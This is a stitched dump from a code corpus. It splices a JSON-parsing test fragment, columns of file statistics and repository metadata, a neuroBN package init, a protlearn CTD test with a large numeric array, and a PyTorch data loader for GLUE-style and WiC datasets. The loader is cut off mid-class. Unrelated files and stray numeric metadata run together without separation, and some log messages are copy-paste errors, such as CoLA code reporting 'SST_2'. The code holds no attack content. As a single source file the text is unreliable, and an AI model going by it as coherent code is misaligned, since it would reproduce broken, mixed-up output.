res = parse_json_file_str_or_arglist([tmp.name])
assert 'key_a' in res
assert res['key_a'] == 1.0
assert 'key_b' in res
assert res['key_b'] == True
assert 'key_c' in res
assert res['key_c'] == ["hello", 42]
assert 'key_d' in res
assert res['key_d'] == "42"
assert len(res) == 4
| 18.6875
| 60
| 0.568562
| 277
| 1,794
| 3.368231
| 0.151625
| 0.115756
| 0.141479
| 0.180064
| 0.836013
| 0.836013
| 0.809218
| 0.779207
| 0.779207
| 0.740622
| 0
| 0.030233
| 0.280936
| 1,794
| 96
| 61
| 18.6875
| 0.693023
| 0.014493
| 0
| 0.706897
| 0
| 0
| 0.21714
| 0
| 0
| 0
| 0
| 0
| 0.465517
| 1
| 0.051724
| false
| 0
| 0.051724
| 0
| 0.103448
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a62638e38c350f74ced4672c471dffc011ffd4c6
| 114
|
py
|
Python
|
neuroBN/inference/marginal_exact/__init__.py
|
Centiment-io/neuroBN
|
0863efd03f5cc79a2084efcc592d34969c16d4a4
|
[
"Apache-2.0"
] | 1
|
2018-09-04T09:32:07.000Z
|
2018-09-04T09:32:07.000Z
|
neuroBN/inference/marginal_exact/__init__.py
|
Centiment-io/neuroBN
|
0863efd03f5cc79a2084efcc592d34969c16d4a4
|
[
"Apache-2.0"
] | null | null | null |
neuroBN/inference/marginal_exact/__init__.py
|
Centiment-io/neuroBN
|
0863efd03f5cc79a2084efcc592d34969c16d4a4
|
[
"Apache-2.0"
] | 2
|
2019-10-03T21:23:09.000Z
|
2020-03-21T11:12:56.000Z
|
from neuroBN.inference.marginal_exact.exact_bp import *
from neuroBN.inference.marginal_exact.ve_marginal import *
| 57
| 58
| 0.868421
| 16
| 114
| 5.9375
| 0.5
| 0.231579
| 0.421053
| 0.589474
| 0.694737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.061404
| 114
| 2
| 58
| 57
| 0.88785
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
a6a09515b0915c221c0f65434350957ef5da1354
| 9,904
|
py
|
Python
|
protlearn/features/tests/test_ctdd.py
|
tadorfer/ProtClass
|
da1a01ea9abd3c367b3389dfed683c6a9dfa6afd
|
[
"MIT"
] | 24
|
2020-09-17T10:35:44.000Z
|
2022-03-09T19:19:01.000Z
|
protlearn/features/tests/test_ctdd.py
|
tadorfer/ProtClass
|
da1a01ea9abd3c367b3389dfed683c6a9dfa6afd
|
[
"MIT"
] | 14
|
2020-08-09T18:23:01.000Z
|
2020-11-19T05:48:14.000Z
|
protlearn/features/tests/test_ctdd.py
|
tadorfer/ProtClass
|
da1a01ea9abd3c367b3389dfed683c6a9dfa6afd
|
[
"MIT"
] | 3
|
2021-03-07T23:41:17.000Z
|
2022-02-25T18:48:37.000Z
|
import pytest
import numpy as np
from ..ctdd import ctdd
import pkg_resources
PATH = pkg_resources.resource_filename(__name__, 'test_data/')
def test_ctdd():
"Test CTD distribution"
# load data
X_list = open(PATH+'multiple.txt').read().splitlines()
X_err = 'AGT2HT9'
# get ctdd
ctdd_list, desc = ctdd(X_list)
# test ctdd
np.testing.assert_almost_equal(ctdd_list,
np.array([[ 0. , 0. , 0. , 0. ,
0. , 14.28571429, 14.28571429, 28.57142857,
42.85714286, 57.14285714, 71.42857143, 100. ,
71.42857143, 85.71428571, 100. , 42.85714286,
57.14285714, 42.85714286, 42.85714286, 57.14285714,
14.28571429, 14.28571429, 28.57142857, 71.42857143,
100. , 0. , 0. , 0. ,
0. , 0. , 42.85714286, 71.42857143,
42.85714286, 57.14285714, 71.42857143, 14.28571429,
28.57142857, 14.28571429, 14.28571429, 28.57142857,
85.71428571, 100. , 85.71428571, 85.71428571,
100. , 42.85714286, 57.14285714, 42.85714286,
42.85714286, 57.14285714, 0. , 0. ,
0. , 0. , 0. , 14.28571429,
14.28571429, 28.57142857, 71.42857143, 100. ,
57.14285714, 57.14285714, 57.14285714, 57.14285714,
57.14285714, 14.28571429, 42.85714286, 14.28571429,
28.57142857, 42.85714286, 71.42857143, 100. ,
71.42857143, 85.71428571, 100. , 42.85714286,
57.14285714, 42.85714286, 42.85714286, 57.14285714,
14.28571429, 71.42857143, 14.28571429, 28.57142857,
71.42857143, 85.71428571, 100. , 85.71428571,
85.71428571, 100. , 14.28571429, 42.85714286,
14.28571429, 28.57142857, 42.85714286, 57.14285714,
57.14285714, 57.14285714, 57.14285714, 57.14285714,
71.42857143, 100. , 71.42857143, 85.71428571,
100. , 14.28571429, 28.57142857, 14.28571429,
14.28571429, 28.57142857, 85.71428571, 100. ,
85.71428571, 85.71428571, 100. , 42.85714286,
71.42857143, 42.85714286, 57.14285714, 71.42857143,
71.42857143, 100. , 71.42857143, 85.71428571,
100. , 14.28571429, 28.57142857, 14.28571429,
14.28571429, 28.57142857, 42.85714286, 57.14285714,
42.85714286, 42.85714286, 57.14285714, 14.28571429,
28.57142857, 14.28571429, 14.28571429, 28.57142857,
85.71428571, 100. , 85.71428571, 85.71428571,
100. , 42.85714286, 71.42857143, 42.85714286,
57.14285714, 71.42857143, 42.85714286, 57.14285714,
42.85714286, 42.85714286, 57.14285714, 14.28571429,
14.28571429, 28.57142857, 71.42857143, 100. ,
0. , 0. , 0. , 0. ,
0. , 14.28571429, 14.28571429, 42.85714286,
57.14285714, 100. , 71.42857143, 71.42857143,
71.42857143, 71.42857143, 71.42857143, 0. ,
0. , 0. , 0. , 0. ,
14.28571429, 14.28571429, 28.57142857, 85.71428571,
100. , 42.85714286, 57.14285714, 42.85714286,
42.85714286, 57.14285714, 71.42857143, 71.42857143,
71.42857143, 71.42857143, 71.42857143],
[ 22.22222222, 22.22222222, 55.55555556, 77.77777778,
100. , 44.44444444, 44.44444444, 44.44444444,
44.44444444, 44.44444444, 11.11111111, 11.11111111,
33.33333333, 66.66666667, 88.88888889, 22.22222222,
22.22222222, 66.66666667, 77.77777778, 100. ,
11.11111111, 33.33333333, 11.11111111, 11.11111111,
33.33333333, 44.44444444, 44.44444444, 44.44444444,
44.44444444, 44.44444444, 22.22222222, 22.22222222,
55.55555556, 66.66666667, 88.88888889, 77.77777778,
100. , 77.77777778, 77.77777778, 100. ,
11.11111111, 44.44444444, 11.11111111, 33.33333333,
44.44444444, 22.22222222, 55.55555556, 22.22222222,
22.22222222, 55.55555556, 66.66666667, 66.66666667,
77.77777778, 88.88888889, 100. , 11.11111111,
44.44444444, 11.11111111, 33.33333333, 44.44444444,
22.22222222, 22.22222222, 55.55555556, 66.66666667,
88.88888889, 77.77777778, 100. , 77.77777778,
77.77777778, 100. , 11.11111111, 44.44444444,
11.11111111, 33.33333333, 44.44444444, 22.22222222,
55.55555556, 22.22222222, 22.22222222, 55.55555556,
66.66666667, 66.66666667, 77.77777778, 88.88888889,
100. , 11.11111111, 44.44444444, 11.11111111,
33.33333333, 44.44444444, 22.22222222, 22.22222222,
55.55555556, 77.77777778, 100. , 44.44444444,
44.44444444, 44.44444444, 44.44444444, 44.44444444,
11.11111111, 11.11111111, 33.33333333, 66.66666667,
88.88888889, 44.44444444, 44.44444444, 66.66666667,
77.77777778, 100. , 11.11111111, 33.33333333,
11.11111111, 22.22222222, 33.33333333, 0. ,
0. , 0. , 0. , 0. ,
11.11111111, 44.44444444, 11.11111111, 33.33333333,
44.44444444, 66.66666667, 66.66666667, 77.77777778,
88.88888889, 100. , 22.22222222, 55.55555556,
22.22222222, 22.22222222, 55.55555556, 55.55555556,
100. , 55.55555556, 77.77777778, 100. ,
11.11111111, 11.11111111, 33.33333333, 44.44444444,
88.88888889, 0. , 0. , 0. ,
0. , 0. , 0. , 0. ,
0. , 0. , 0. , 11.11111111,
11.11111111, 44.44444444, 77.77777778, 100. ,
22.22222222, 55.55555556, 22.22222222, 22.22222222,
55.55555556, 11.11111111, 33.33333333, 11.11111111,
22.22222222, 33.33333333, 44.44444444, 44.44444444,
44.44444444, 44.44444444, 44.44444444, 55.55555556,
55.55555556, 66.66666667, 77.77777778, 100. ,
11.11111111, 11.11111111, 33.33333333, 44.44444444,
100. , 22.22222222, 55.55555556, 22.22222222,
22.22222222, 55.55555556, 66.66666667, 88.88888889,
66.66666667, 66.66666667, 88.88888889],
[ 62.5 , 100. , 62.5 , 87.5 ,
100. , 12.5 , 12.5 , 25. ,
37.5 , 75. , 0. , 0. ,
0. , 0. , 0. , 12.5 ,
12.5 , 62.5 , 87.5 , 100. ,
25. , 50. , 25. , 37.5 ,
50. , 75. , 75. , 75. ,
75. , 75. , 12.5 , 12.5 ,
62.5 , 87.5 , 100. , 25. ,
50. , 25. , 37.5 , 50. ,
75. , 75. , 75. , 75. ,
75. , 12.5 , 100. , 12.5 ,
87.5 , 100. , 62.5 , 62.5 ,
62.5 , 62.5 , 62.5 , 25. ,
25. , 37.5 , 50. , 75. ,
62.5 , 100. , 62.5 , 87.5 ,
100. , 12.5 , 12.5 , 25. ,
37.5 , 50. , 75. , 75. ,
75. , 75. , 75. , 12.5 ,
12.5 , 62.5 , 87.5 , 100. ,
25. , 50. , 25. , 37.5 ,
50. , 75. , 75. , 75. ,
75. , 75. , 12.5 , 12.5 ,
37.5 , 62.5 , 100. , 75. ,
75. , 75. , 75. , 75. ,
0. , 0. , 0. , 0. ,
0. , 25. , 25. , 50. ,
75. , 100. , 62.5 , 62.5 ,
62.5 , 62.5 , 62.5 , 12.5 ,
12.5 , 12.5 , 12.5 , 12.5 ,
75. , 75. , 75. , 75. ,
75. , 25. , 50. , 25. ,
37.5 , 50. , 12.5 , 12.5 ,
62.5 , 87.5 , 100. , 25. ,
25. , 37.5 , 50. , 100. ,
62.5 , 75. , 62.5 , 62.5 ,
75. , 12.5 , 12.5 , 12.5 ,
12.5 , 12.5 , 12.5 , 12.5 ,
12.5 , 12.5 , 12.5 , 25. ,
25. , 37.5 , 50. , 75. ,
87.5 , 100. , 87.5 , 87.5 ,
100. , 12.5 , 12.5 , 25. ,
37.5 , 50. , 75. , 75. ,
75. , 75. , 75. , 62.5 ,
100. , 62.5 , 87.5 , 100. ,
25. , 25. , 37.5 , 50. ,
75. , 12.5 , 12.5 , 62.5 ,
87.5 , 100. , 0. , 0. ,
0. , 0. , 0. ]])
, decimal=3)
# test ValueError
with pytest.raises(ValueError):
ctdd_error, desc = ctdd(X_err)
| 57.918129
| 70
| 0.41559
| 1,055
| 9,904
| 3.88436
| 0.074882
| 0.021962
| 0.025622
| 0.024402
| 0.864812
| 0.857491
| 0.84041
| 0.829429
| 0.818204
| 0.795998
| 0
| 0.702991
| 0.459814
| 9,904
| 171
| 71
| 57.918129
| 0.062991
| 0.006765
| 0
| 0.329193
| 0
| 0
| 0.005073
| 0
| 0
| 0
| 0
| 0
| 0.006211
| 1
| 0.006211
| false
| 0
| 0.024845
| 0
| 0.031056
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a6a92609b15f2018096022b7800d224711b8f470
| 80,372
|
py
|
Python
|
src/data_loader.py
|
uhh-lt/DT2ContextRep
|
5e04bb5abc10eee895dd85e82fb0d2132d4939e1
|
[
"MIT"
] | null | null | null |
src/data_loader.py
|
uhh-lt/DT2ContextRep
|
5e04bb5abc10eee895dd85e82fb0d2132d4939e1
|
[
"MIT"
] | null | null | null |
src/data_loader.py
|
uhh-lt/DT2ContextRep
|
5e04bb5abc10eee895dd85e82fb0d2132d4939e1
|
[
"MIT"
] | null | null | null |
import os
from tqdm import tqdm
import torch
from torch.utils.data import Dataset
from torch_geometric.data import Data
from torch_geometric.data import Dataset as GraphDataset
from torch_geometric.data import DataLoader as GraphDataLoader
from transformers import AutoTokenizer
import utils
import config
class WrapperDataset(Dataset):
def __init__(self, *datasets):
assert(all(len(dataset) == len(datasets[0]) for dataset in datasets))
self.datasets = list()
for dataset in datasets:
self.datasets.append(dataset)
assert(len(self.datasets) > 0)
def __len__(self):
return len(self.datasets[0])
def __getitem__(self, idx):
output = list()
for dataset in self.datasets:
output.append(dataset[idx])
return tuple(output)
class WiCLMDataset(Dataset):
max_length = 80
def __init__(self, data_frame, tokenizer):
self.data_frame = data_frame
self.tokenizer = tokenizer
assert(self.max_length <= self.tokenizer.model_max_length)
def _compute_max_length(self):
print(f'Computing max length (sub-word + special tokens) on WiC dataset')
max_length = 0
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
sentence_1 = row['context_1'].lower()
sentence_2 = row['context_2'].lower()
input_ids = self.tokenizer.encode(sentence_1, sentence_2, add_special_tokens=True)
max_length = max(max_length, len(input_ids))
max_length = max_length if max_length <= self.tokenizer.model_max_length else self.tokenizer.model_max_length
print(f'Max length (sub-word + special tokens) on WiC dataset: {max_length}')
def __len__(self):
return self.data_frame.shape[0]
def __getitem__(self, idx):
row = self.data_frame.iloc[idx, :]
sentence_1 = row['context_1'].lower()
sentence_2 = row['context_2'].lower()
input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, [sentence_1, sentence_2], self.max_length)
return input_ids, token_type_ids, attention_mask
class WiCAuxDataset(GraphDataset):
def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
self.data_frame = data_frame
self.DT_G = DT_G
assert(sum([is_sentence_1, is_sentence_2]) == 1)
self.is_sentence_1 = is_sentence_1
self.is_sentence_2 = is_sentence_2
super(WiCAuxDataset, self).__init__(root, transform, pre_transform)
print(f'Loaded processed WiC Aux dataset from {root}')
@property
def raw_file_names(self):
return []
@property
def processed_file_names(self):
if(self.is_sentence_1):
return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
elif(self.is_sentence_2):
return [f'aux_2_{i}.pt' for i in range(self.data_frame.shape[0])]
def process(self):
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
label = row['label']
index_1, index_2 = list(map(int, row['indices'].split('-')))
if(self.is_sentence_1):
context = row['context_1']
word_loc = index_1
elif(self.is_sentence_2):
context = row['context_2']
word_loc = index_2
context = context.lower()
edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
data = Data()
data['edge_index'] = edge_index.to(config.device)
data['edge_attr'] = edge_attr.to(config.device)
data['y'] = utils.get_label_embedding(label, config.WiC_labels).to(config.device)
data['word_loc'] = torch.LongTensor([word_loc]).to(config.device)
data['sentence'] = context
data.num_nodes = len(context.split())
if(self.pre_filter is not None and not self.pre_filter(data)):
continue
if(self.pre_transform is not None):
data = self.pre_transform(data)
if(self.is_sentence_1):
torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
elif(self.is_sentence_2):
torch.save(data, os.path.join(self.processed_dir, f'aux_2_{row_index}.pt'))
def len(self):
return len(self.processed_file_names)
def get(self, idx):
if(self.is_sentence_1):
data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
elif(self.is_sentence_2):
data = torch.load(os.path.join(self.processed_dir, f'aux_2_{idx}.pt'))
return data
class RTELMDataset(Dataset):
max_length = 307
def __init__(self, data_frame, tokenizer):
self.data_frame = data_frame
self.tokenizer = tokenizer
assert(self.max_length <= self.tokenizer.model_max_length)
def _compute_max_length(self):
print(f'Computing max length (sub-word + special tokens) on RTE dataset')
max_length = 0
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
sentence_1 = row['sentence1'].lower()
sentence_2 = row['sentence2'].lower()
input_ids = self.tokenizer.encode(sentence_1, sentence_2, add_special_tokens=True)
max_length = max(max_length, len(input_ids))
max_length = max_length if max_length <= self.tokenizer.model_max_length else self.tokenizer.model_max_length
print(f'Max length (sub-word + special tokens) on RTE dataset: {max_length}')
def __len__(self):
return self.data_frame.shape[0]
def __getitem__(self, idx):
row = self.data_frame.iloc[idx, :]
sentence_1 = row['sentence1'].lower()
sentence_2 = row['sentence2'].lower()
input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, [sentence_1, sentence_2], self.max_length)
return input_ids, token_type_ids, attention_mask
class RTEAuxDataset(GraphDataset):
def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
self.data_frame = data_frame
self.DT_G = DT_G
assert(sum([is_sentence_1, is_sentence_2]) == 1)
self.is_sentence_1 = is_sentence_1
self.is_sentence_2 = is_sentence_2
super(RTEAuxDataset, self).__init__(root, transform, pre_transform)
print(f'Loaded processed RTE dataset from {root}')
@property
def raw_file_names(self):
return []
@property
def processed_file_names(self):
if(self.is_sentence_1):
return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
elif(self.is_sentence_2):
return [f'aux_2_{i}.pt' for i in range(self.data_frame.shape[0])]
def process(self):
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
label = row['label']
if(self.is_sentence_1):
context = row['sentence1']
elif(self.is_sentence_2):
context = row['sentence2']
context = context.lower()
edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
data = Data()
data['edge_index'] = edge_index.to(config.device)
data['edge_attr'] = edge_attr.to(config.device)
data['y'] = utils.get_label_embedding(label, config.RTE_labels).to(config.device)
data['sentence'] = context
data.num_nodes = len(context.split())
if(self.pre_filter is not None and not self.pre_filter(data)):
continue
if(self.pre_transform is not None):
data = self.pre_transform(data)
if(self.is_sentence_1):
torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
elif(self.is_sentence_2):
torch.save(data, os.path.join(self.processed_dir, f'aux_2_{row_index}.pt'))
def len(self):
return len(self.processed_file_names)
def get(self, idx):
if(self.is_sentence_1):
data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
elif(self.is_sentence_2):
data = torch.load(os.path.join(self.processed_dir, f'aux_2_{idx}.pt'))
return data
class STS_BLMDataset(Dataset):
max_length = 127
def __init__(self, data_frame, tokenizer):
self.data_frame = data_frame
self.tokenizer = tokenizer
assert(self.max_length <= self.tokenizer.model_max_length)
def _compute_max_length(self):
print(f'Computing max length (sub-word + special tokens) on STS_B dataset')
max_length = 0
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
sentence_1 = row['sent_a'].lower()
sentence_2 = row['sent_b'].lower()
input_ids = self.tokenizer.encode(sentence_1, sentence_2, add_special_tokens=True)
max_length = max(max_length, len(input_ids))
max_length = max_length if max_length <= self.tokenizer.model_max_length else self.tokenizer.model_max_length
print(f'Max length (sub-word + special tokens) on STS_B dataset: {max_length}')
def __len__(self):
return self.data_frame.shape[0]
def __getitem__(self, idx):
row = self.data_frame.iloc[idx, :]
sentence_1 = row['sent_a'].lower()
sentence_2 = row['sent_b'].lower()
input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, [sentence_1, sentence_2], self.max_length)
return input_ids, token_type_ids, attention_mask
class STS_BAuxDataset(GraphDataset):
def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
self.data_frame = data_frame
self.DT_G = DT_G
assert(sum([is_sentence_1, is_sentence_2]) == 1)
self.is_sentence_1 = is_sentence_1
self.is_sentence_2 = is_sentence_2
super(STS_BAuxDataset, self).__init__(root, transform, pre_transform)
print(f'Loaded processed STS_B dataset from {root}')
@property
def raw_file_names(self):
return []
@property
def processed_file_names(self):
if(self.is_sentence_1):
return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
elif(self.is_sentence_2):
return [f'aux_2_{i}.pt' for i in range(self.data_frame.shape[0])]
def process(self):
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
score = row['score_f']
if(self.is_sentence_1):
context = row['sent_a']
elif(self.is_sentence_2):
context = row['sent_b']
context = context.lower()
edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
data = Data()
data['edge_index'] = edge_index.to(config.device)
data['edge_attr'] = edge_attr.to(config.device)
data['y'] = utils.get_score_embedding(score)
data['sentence'] = context
data.num_nodes = len(context.split())
if(self.pre_filter is not None and not self.pre_filter(data)):
continue
if(self.pre_transform is not None):
data = self.pre_transform(data)
if(self.is_sentence_1):
torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
elif(self.is_sentence_2):
torch.save(data, os.path.join(self.processed_dir, f'aux_2_{row_index}.pt'))
def len(self):
return len(self.processed_file_names)
def get(self, idx):
if(self.is_sentence_1):
data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
elif(self.is_sentence_2):
data = torch.load(os.path.join(self.processed_dir, f'aux_2_{idx}.pt'))
return data
class MRPCLMDataset(Dataset):
max_length = 139
def __init__(self, data_frame, tokenizer):
self.data_frame = data_frame
self.tokenizer = tokenizer
assert(self.max_length <= self.tokenizer.model_max_length)
def _compute_max_length(self):
print(f'Computing max length (sub-word + special tokens) on MRPC dataset')
max_length = 0
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
sentence_1 = row['#1 String'].lower()
sentence_2 = row['#2 String'].lower()
input_ids = self.tokenizer.encode(sentence_1, sentence_2, add_special_tokens=True)
max_length = max(max_length, len(input_ids))
max_length = max_length if max_length <= self.tokenizer.model_max_length else self.tokenizer.model_max_length
print(f'Max length (sub-word + special tokens) on MRPC dataset: {max_length}')
def __len__(self):
return self.data_frame.shape[0]
def __getitem__(self, idx):
row = self.data_frame.iloc[idx, :]
sentence_1 = row['#1 String'].lower()
sentence_2 = row['#2 String'].lower()
input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, [sentence_1, sentence_2], self.max_length)
return input_ids, token_type_ids, attention_mask
class MRPCAuxDataset(GraphDataset):
def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
self.data_frame = data_frame
self.DT_G = DT_G
assert(sum([is_sentence_1, is_sentence_2]) == 1)
self.is_sentence_1 = is_sentence_1
self.is_sentence_2 = is_sentence_2
super(MRPCAuxDataset, self).__init__(root, transform, pre_transform)
print(f'Loaded processed MRPC dataset from {root}')
@property
def raw_file_names(self):
return []
@property
def processed_file_names(self):
if(self.is_sentence_1):
return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
elif(self.is_sentence_2):
return [f'aux_2_{i}.pt' for i in range(self.data_frame.shape[0])]
def process(self):
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
label = row['Quality']
if(self.is_sentence_1):
context = row['#1 String']
elif(self.is_sentence_2):
context = row['#2 String']
context = context.lower()
edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
data = Data()
data['edge_index'] = edge_index.to(config.device)
data['edge_attr'] = edge_attr.to(config.device)
data['y'] = utils.get_label_embedding(label, config.MRPC_labels).to(config.device)
data['sentence'] = context
data.num_nodes = len(context.split())
if(self.pre_filter is not None and not self.pre_filter(data)):
continue
if(self.pre_transform is not None):
data = self.pre_transform(data)
if(self.is_sentence_1):
torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
elif(self.is_sentence_2):
torch.save(data, os.path.join(self.processed_dir, f'aux_2_{row_index}.pt'))
def len(self):
return len(self.processed_file_names)
def get(self, idx):
if(self.is_sentence_1):
data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
elif(self.is_sentence_2):
data = torch.load(os.path.join(self.processed_dir, f'aux_2_{idx}.pt'))
return data
class SST_2LMDataset(Dataset):
max_length = 81
def __init__(self, data_frame, tokenizer):
self.data_frame = data_frame
self.tokenizer = tokenizer
assert(self.max_length <= self.tokenizer.model_max_length)
def _compute_max_length(self):
print(f'Computing max length (sub-word + special tokens) on SST_2 dataset')
max_length = 0
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
sentence_1 = row['sentence'].lower()
input_ids = self.tokenizer.encode(sentence_1, add_special_tokens=True)
max_length = max(max_length, len(input_ids))
max_length = max_length if max_length <= self.tokenizer.model_max_length else self.tokenizer.model_max_length
print(f'Max length (sub-word + special tokens) on SST_2 dataset: {max_length}')
def __len__(self):
return self.data_frame.shape[0]
def __getitem__(self, idx):
row = self.data_frame.iloc[idx, :]
sentence_1 = row['sentence'].lower()
input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, [sentence_1], self.max_length)
return input_ids, token_type_ids, attention_mask
class SST_2AuxDataset(GraphDataset):
def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
assert(is_sentence_1 == True and is_sentence_2 == False)
self.data_frame = data_frame
self.DT_G = DT_G
super(SST_2AuxDataset, self).__init__(root, transform, pre_transform)
print(f'Loaded processed SST_2 dataset from {root}')
@property
def raw_file_names(self):
return []
@property
def processed_file_names(self):
return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
def process(self):
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
label = row['label']
context = row['sentence'].lower()
edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
data = Data()
data['edge_index'] = edge_index.to(config.device)
data['edge_attr'] = edge_attr.to(config.device)
data['y'] = utils.get_label_embedding(label, config.SST_2_labels)
data['sentence'] = context
data.num_nodes = len(context.split())
if(self.pre_filter is not None and not self.pre_filter(data)):
continue
if(self.pre_transform is not None):
data = self.pre_transform(data)
torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
def len(self):
return len(self.processed_file_names)
def get(self, idx):
data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
return data
class CoLA_LMDataset(Dataset):
max_length = 48
def __init__(self, data_frame, tokenizer):
self.data_frame = data_frame
self.tokenizer = tokenizer
assert(self.max_length <= self.tokenizer.model_max_length)
def _compute_max_length(self):
print(f'Computing max length (sub-word + special tokens) on SST_2 dataset')
max_length = 0
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
sentence_1 = row['sentence'].lower()
input_ids = self.tokenizer.encode(sentence_1, add_special_tokens=True)
max_length = max(max_length, len(input_ids))
max_length = max_length if max_length <= self.tokenizer.model_max_length else self.tokenizer.model_max_length
print(f'Max length (sub-word + special tokens) on SST_2 dataset: {max_length}')
def __len__(self):
return self.data_frame.shape[0]
def __getitem__(self, idx):
row = self.data_frame.iloc[idx, :]
sentence_1 = row['sentence'].lower()
input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, [sentence_1], self.max_length)
return input_ids, token_type_ids, attention_mask
class CoLAAuxDataset(GraphDataset):
def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
assert(is_sentence_1 == True and is_sentence_2 == False)
self.data_frame = data_frame
self.DT_G = DT_G
super(CoLAAuxDataset, self).__init__(root, transform, pre_transform)
print(f'Loaded processed CoLA dataset from {root}')
@property
def raw_file_names(self):
return []
@property
def processed_file_names(self):
return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
def process(self):
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
label = row['label']
context = row['sentence'].lower()
edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
data = Data()
data['edge_index'] = edge_index.to(config.device)
data['edge_attr'] = edge_attr.to(config.device)
data['y'] = utils.get_label_embedding(label, config.CoLA_labels)
data['sentence'] = context
data.num_nodes = len(context.split())
if(self.pre_filter is not None and not self.pre_filter(data)):
continue
if(self.pre_transform is not None):
data = self.pre_transform(data)
torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
def len(self):
return len(self.processed_file_names)
def get(self, idx):
data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
return data
class WNLI_TranslatedLMDataset(Dataset):
max_length = 171
def __init__(self, data_frame, tokenizer):
self.data_frame = data_frame
self.tokenizer = tokenizer
assert(self.max_length <= self.tokenizer.model_max_length)
def _compute_max_length(self):
print(f'Computing max length (sub-word + special tokens) on WLNI_Translated dataset')
max_length = 0
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
sentence_1 = row['sentence1']
sentence_2 = row['sentence2']
input_ids = self.tokenizer.encode(sentence_1, sentence_2, add_special_tokens=True)
max_length = max(max_length, len(input_ids))
max_length = max_length if max_length <= self.tokenizer.model_max_length else self.tokenizer.model_max_length
print(f'Max length (sub-word + special tokens) on WLNI_Translated dataset: {max_length}')
def __len__(self):
return self.data_frame.shape[0]
def __getitem__(self, idx):
row = self.data_frame.iloc[idx, :]
sentence_1 = row['sentence1']
sentence_2 = row['sentence2']
input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, [sentence_1, sentence_2], self.max_length)
return input_ids, token_type_ids, attention_mask
class WNLI_TranslatedAuxDataset(GraphDataset):
